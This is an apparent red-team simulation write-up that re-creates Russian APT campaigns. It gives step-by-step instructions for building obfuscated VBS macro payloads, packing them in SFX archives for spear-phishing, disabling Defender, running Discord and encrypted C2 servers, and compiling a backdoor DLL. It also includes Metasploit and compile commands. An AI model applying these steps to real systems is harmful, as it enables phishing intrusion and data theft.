Second the attackers exploited the Zero-day vulnerability (CVE-2017-11882) is a vulnerability in

Microsoft Office, specifically affecting Microsoft Office 2007 Service Pack 3, Microsoft Office
2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016. This
vulnerability is classified as a memory corruption issue that occurs due to improper handling
of objects in memory.

Exploitation repository: https://github.com/0x09AL/CVE-2017-11882-metasploit?tab=readme-ov-file

This vulnerability allow an attacker to run arbitrary code in the context of the current user by failing
to properly handle objects in memory, I then placed a Word file in the phishing email, including
links to Zip files containing malicious shortcuts (LNK).

sudo cp cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat

sudo updatedb

msf6 > use exploit/windows/fileformat/office_ms17_11882

The third stage (Data Exfiltration) over Discord API C2 Channe

The attackers used the Discord C2 (Command and Control) API as a means to establish a
communication channel between their payload and the attacker's server. By using Discord as a
C2 server, attackers can hide their malicious activities among the legitimate traffic to Discord,
making it harder for security teams to detect the threat.

First, i need to create a Discord account and activate its permissions, as shown in the following figure

1. Create Discord Application.

 2. Configure Discord Application.

3. Go to "Bot", find "Privileged Gateway Intents", turn on all three "Intents", and save.
This script integrates Discord API functionality to facilitate communication between the
compromised system and the attacker-controlled server, thereby potentially hiding the traffic within
legitimate Discord communication and checks if the Discord bot token and channel ID are provided.
If they are, it starts the Discord bot functionalities; otherwise, it proceeds with just the IP and port.
This way, the script can continue the connection without the Discord details if they are not entered.

The fourth stage (SaintBot payload Loader)

SaintBot is a recently discovered malware loader, documented in April 2021 by MalwareBytes.

It contains capabilities to download further payloads as requested by threat actors, executing the
payloads through several different means, such as injecting into a spawned process or loading into
local memory. It can also update itself on disk – and remove any traces of its existence – as and
when needed. SHA-256: e8207e8c31a8613112223d126d4f12e7a5f8caf4acaaf40834302ce49f37cc9c

1.Locale Check: The IsSupportedLocale function checks if the system's locale matches specific
locales.

2.Downloading Payload: The DownloadPayload function downloads a file from a specified URL
and saves it to a specified filepath.
3.Injecting into a Process: The InjectIntoProcess function injects a DLL into a running process by
its name.

4.Self-Deleting: The SelfDelete function deletes the executable after its execution.
The fifth stage (disable windows defender)
This batch file is used to disable Windows Defender functionality. It accomplishes this by executing
multiple commands via CMD that modify registry keys and disabling Windows Defender scheduled
tasks.

The sixth stage (OutSteel stealer)

OutSteel is a file uploader and document stealer developed with the scripting language AutoIT. It is
executed along with the other binaries. It begins by scanning through the local disk in search of
files containing specific extensions, before uploading those files to a hardcoded command and
control (C2) server. I simulated this Infostealer but through PowerShell Script.
Primitive Bear

This is a simulation of attack by (Primitive Bear) APT group targeting the State Migration Service of
Ukraine the attack campaign was active from first of December to June 2021, The attack chain starts
with Word document sent to the victim via email then VBS payload is used to obtain the command
and control, before placing the payload or injecting it into the Word file an obfuscation of the payload
is done to create an evasion of the detection then it is injected through the macro into the Word
document, Then i create an SFX archive and put the payload Word file inside it to get command and
control and use this SFX archive to perform a spear phishing attack then i get command and control
by opening the Word file. I relied on palo alto networks to figure out the details to make this
simulation: https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/

This attack included several stages including Create an SFX file with Word File inside it. This Word
File contains VBS script which is responsible for command and control and make obfuscation VBS
script payload before putting it inside the word file this sent through spear phishing attack and make
remote communication by utilizes DES encryption for secure data transmission between the attacker
server and the target.

1. Create the Word Document: Write a Word document (.doc or .docx) containing the macro with the
obfuscated VBS payload. The macro should be designed to execute the payload when the
document is opened.

2. Create a VBScript payload designed to establish a reverse connection to the Command and
Control (C2) server.

3. Obfuscate the VBS Payload: Obfuscate the VBS payload to make it more difficult to detect
by antivirus software or security solutions.

4. Create a Self-Extracting Archive with WinRAR: Use WinRAR to create a self-extracting (SFX)
archive. Add the Word document containing the macro and the obfuscated VBS payload to the
archive.

5. Place the obfuscated VBS payload and word file inside the SFX archive to send to the target.

6. Final result make remote communication by utilizes DES encryption for secure data transmission
between the attacker server and the target.
The first stage (delivery technique)

I began by drafting the phishing email in a Word document for the upcoming attack. Subsequently,
prior to crafting the payload, which will consist of a VBS Script injected into macros, I will encapsulate
them within an SFX file. The assault targeted the Ukrainian Immigration Department, with the phishing
correspondence purporting to offer financial assistance totaling 2 billion dollars.

This word file will be used to place the VBS script payload into it after obfuscation here will help make
detection more difficult when placing this VBS script inside the macro in word file.
The Second stage (VBScript payload)
First i will create a VBS payload which is a simple VBS script designed to establish a reverse
connection to the C2 server then open a Word file enable macros and insert the payload into the
macro finally i will save the document.

The third stage (Obfuscation VBS payload)

But before I put the VBS payload in the macro i will make an obfuscate to the scripts to make it
difficult to detect and i used online VBScript obfuscator to make obfuscate:
https://isvbscriptdead.com/vbs-obfuscator/
The fourth stage (implanting technique)
Now i will place the obfuscated VBS payload in the microsoft Word File by opening the View menu
clicking on Micros, and creating a new macro file.

Save the Word file with the obfuscated VBScript payload embedded in the macro, thus i will be able
to execute for the payload file when opening word file.
The fifth stage (make SFX archive)
Now i will create SFX Archive using WinRAR and take the SFX file that contains the Word Document
inside it with obfuscated VBS payload via the macro and send it in a spear phishing.

1.Open WinRAR and select the files to be included in the archive.

2.Go to the "Add" menu and choose "Add to archive..."

3.In the "Archive name and parameters" window, select "SFX" as the archive format.

4.Configure the SFX options as desired, including the extraction path and execution parameters.

Final result (payload connect to C2-server)

This Perl C2 server script enable to make remote communication by utilizes DES encryption for
secure data transmission between the attacker server and the target.

get_attacker_info and get_port: Prompts for the IP address and port number.

get_des_key: Prompts for a DES key of 8 bytes.

encrypt_data: Encrypts command results using DES with padding.

main: Sets up a TCP server, accepts connections, executes commands, encrypts results, and sends

them to the client.

Voodoo Bear APT44
This is a simulation of attack by (Voodoo Bear) APT44 group targeting entities in Eastern Europe the
attack campaign was active as early as mid-2022, The attack chain starts with backdoor which is a
DLL targets both 32-bit and 64-bit Windows environments, It gathers information and fingerprints the
user and the machine then sends the information to the attackers-controlled C2, The backdoor uses
a multi-threaded approach, and leverages event objects for data synchronization and signaling
across threads. I relied on withsecure tofigure out the details to make this simulation:
https://labs.withsecure.com/publications/kapeka

Kapeka, which means “little stork” in Russian, is a flexible backdoor written in C++. It allows the
threat actors to use it as an early stage toolkit, while also providing long term persistence to the
victim network. Kapeka’s dropper is a 32-bit Windows executable that drops and launches the
backdoor on a victim machine. The dropper also sets up persistence by creating a scheduled task or
autorun registry. Finally, the dropper removes itself from the system. If you need to know more about
Kapeka backdoor for Voodoo Bear APT group:
https://blog.polyswarm.io/voodoo-bears-kapeka-backdoor-targets-critical-infrastructure

1. RSA C2-Server: I developed C2 server script enable to make remote communication by

utilizes RSA encryption for secure data transmission between the attacker server and the target.

2. Testing payload : I used payload written by Python only to test C2 (testing payload.py), if there
were any problems with the connection (just for test connection) before writing the actual payload.

3. DLL backdoor: I have developed a simulation of the kapeka backdoor that the attackers used
in the actual attack.
The first stage (RSA C2-Server)
This PHP C2 server script enable to make remote communication by utilizes RSA encryption for
secure data transmission between the attacker server and the target.

rsa_encrypt($data, $public_key):

Purpose: Encrypts data using the RSA public key. Process: The function takes the data and the
public key as input, then uses openssl_public_encrypt to encrypt the data with the provided public
key. Output: Returns the encrypted data.

rsa_decrypt($data, $private_key):

Purpose: Decrypts data using the RSA private key. Process: The function takes the encrypted
data and the private key as input, then uses openssl_private_decrypt to decrypt the data with the
provided private key. Output: Returns the decrypted data.
 The Second stage (Testing payload)
I used payload written by Python only to test C2 (testing payload.py), if there were any problems
with the connection (just for test connection) before writing the actual payload.

RSA and PKCS1_OAEP from pycryptodome: For encryption and decryption using RSA.

rsa_encrypt(data, public_key): Encrypts data using the provided public key.

rsa_decrypt(data, private_key): Decrypts data using the provided private key (not used in this script).
Note: Ensure that the server is correctly sending RSA-encrypted commands and handling the
responses appropriately. The script requires the pycryptodome library for RSA encryption and
decryption:

pip install pycryptodome

The third stage (kapeka backdoor)

The Kapeka backdoor is a Windows DLL containing one function which has been
exported by ordinal2 (rather than by name). The backdoor is written in C++ and
compiled (linker 14.16) using Visual Studio 2017 (15.9). The backdoor file masquerades
as a Microsoft Word Add-In with its extension (.wll), but in reality it is a DLL file.

I have developed a simulation of the kapeka backdoor that the attackers used in the
actual attack.

In total, the backdoor launches four main threads:

• First thread: This is the primary thread which performs the initialization and exit
routine, as well as C2 polling to receive tasks or an updated C2 configuration.

• Second thread: Monitors for Windows log off events, signaling the primary thread to
perform the backdoor’s graceful exit routine upon log off.
• Third thread: Monitors for incoming tasks to be processed. This thread launches subsequent
threads to execute each received task.

• Fourth thread: Monitors for completion of tasks to send back the processed task results to the C2.

manual compile:x86_64-w64-mingw32-g++ -shared -o kapeka_backdoor.dll kapeka_backdoor.cpp

-lws2_32

Run the DLL:rundll32.exe kapeka_backdoor.dll,ExportedFunction -d

All of these attacks were simulated, and the tools and tactics were developed by

Abdulrahman Ali (S3N4T0R).

LinkedIn: /in/abdulrehman-a-4472a3243/

Github:/S3N4T0R-0X0

Disclaimer: This is for research, awareness, and educational purposes.

I am not responsible if anyone uses this technique for illegal purposes.

All of this adversary simulation is powered by Bear-C2.

To be continued...